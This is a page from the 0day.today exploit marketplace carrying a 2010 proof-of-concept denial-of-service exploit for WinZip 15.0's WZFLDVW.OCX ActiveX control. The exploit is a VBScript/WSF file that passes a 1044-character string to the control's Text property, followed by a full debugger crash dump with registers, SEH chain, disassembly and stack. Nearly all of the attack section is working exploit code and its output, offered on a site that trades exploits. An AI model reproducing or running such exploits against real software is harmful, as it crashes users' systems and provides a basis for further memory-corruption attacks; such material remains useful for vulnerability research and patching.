[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

Winzip 15.0 WZFLDVW.OCX Text Property Denial of Service

Author
Fady Osman
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15071
Category
dos / poc
Date add
07-12-2010
Platform
windows
=======================================================
Winzip 15.0 WZFLDVW.OCX Text Property Denial of Service
=======================================================

# Exploit Title: Winzip WZFLDVW.OCX text property access violation
# Author: fady mohamed osman
# Software Link : http://www.winzip.com/downwz.htm
# Version:  15.0 (Build 9334)
# Tested on: Win XP Sp2
# CVE : N/A
 
# Website : http://www.darkmasters.co.cc/
# Twitter : http://twitter.com/Fady_Osman
 
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:4E3770F4-1937-4F05-B9A2-959BE7321909' id='target' />
<script language='vbscript'>
 
 
'Wscript.echo typename(target)
 
'for debugging/custom prolog
targetFile = "C:\Program Files\WinZip\WZFLDVW.OCX"
prototype  = "Invoke_Unknown Text As String"
memberName = "Text"
progid     = "FolderViewControl.TreeNode"
argCount   = 1
 
arg1=String(1044, "A")
 
target.Text = arg1
 
</script></job></package>
 
Exception Code: ACCESS_VIOLATION
Disasm: 1643D05 PUSH DWORD PTR [ECX+20]
 
Seh Chain:
--------------------------------------------------
1   180B82F     wzfldvw.ocx
2   180B8F0     wzfldvw.ocx
3   73351571    VBSCRIPT.dll
4   73350F38    VBSCRIPT.dll
5   73351DA5    VBSCRIPT.dll
6   7335119D    VBSCRIPT.dll
7   7C8399F3    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
wzfldvw.1643D05               wzfldvw.16314E1              
wzfldvw.16314E1               wzfldvw.1666F8C              
wzfldvw.1666F8C               wzfldvw.16434A0              
wzfldvw.16434A0               VBSCRIPT.73313A78            
VBSCRIPT.73313A78             VBSCRIPT.733139F6            
VBSCRIPT.733139F6             VBSCRIPT.73304B01            
VBSCRIPT.73304B01             VBSCRIPT.73306959            
VBSCRIPT.73306959             VBSCRIPT.73301E55            
VBSCRIPT.73301E55             VBSCRIPT.73303A76            
VBSCRIPT.73303A76             VBSCRIPT.7330BE2A            
VBSCRIPT.7330BE2A             VBSCRIPT.7330BEB9            
VBSCRIPT.7330BEB9             SCROBJ.5CE4915E              
SCROBJ.5CE4915E               SCROBJ.5CE4CF9C              
SCROBJ.5CE4CF9C               SCROBJ.5CE4D0E2              
SCROBJ.5CE4D0E2               SCROBJ.5CE4B106              
SCROBJ.5CE4B106               SCROBJ.5CE4B49F              
SCROBJ.5CE4B49F               100BB36                      
100BB36                       1005EFE                      
1005EFE                       1005215                      
1005215                       100492B                      
100492B                       1004A89                      
1004A89                       1003C7B                      
1003C7B                       KERNEL32.7C816D4F            
 
 
Registers:
--------------------------------------------------
EIP 01643D05 -> 00000001
EAX 0013EB1C -> 00000001
EBX 00000000
ECX BAADF00D
EDX 01642B94 -> 18EBD88B
EDI 00000008
ESI 0013EB70 -> 01666F8C
EBP 0013EB44 -> 0013EB6C
ESP 0013EB10 -> 0000113F
 
 
Block Disassembly:
--------------------------------------------------
1643CF4 MOV EAX,[EBP+24]
1643CF7 MOV [EBP-4],EAX
1643CFA LEA EAX,[EBP-28]
1643CFD PUSH EAX
1643CFE PUSH 0
1643D00 PUSH 113F
1643D05 PUSH DWORD PTR [ECX+20]   <--- CRASH
1643D08 CALL [182CA6C]
1643D0E LEAVE
1643D0F RETN 20
1643D12 MOV EDI,EDI
1643D14 PUSH EBP
1643D15 MOV EBP,ESP
1643D17 SUB ESP,3C
1643D1A MOV EAX,[EBP+8]
 
 
ArgDump:
--------------------------------------------------
EBP+8   BAADF00D
EBP+12  00000001
EBP+16  0019B05C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20  00000000
EBP+24  00000000
EBP+28  00000000
 
 
Stack Dump:
--------------------------------------------------
13EB10 3F 11 00 00 00 00 00 00 1C EB 13 00 01 00 00 00  [................]
13EB20 0D F0 AD BA 00 00 00 00 00 00 00 00 5C B0 19 00  [............\...]
13EB30 D0 EB 13 00 00 00 00 00 00 00 00 00 08 EC 13 00  [................]
13EB40 00 00 00 00 6C EB 13 00 E1 14 63 01 0D F0 AD BA  [....l.....c.....]
13EB50 01 00 00 00 5C B0 19 00 00 00 00 00 00 00 00 00  [....\...........]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c826cab     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c826cab     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)



#  0day.today [2024-11-15]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team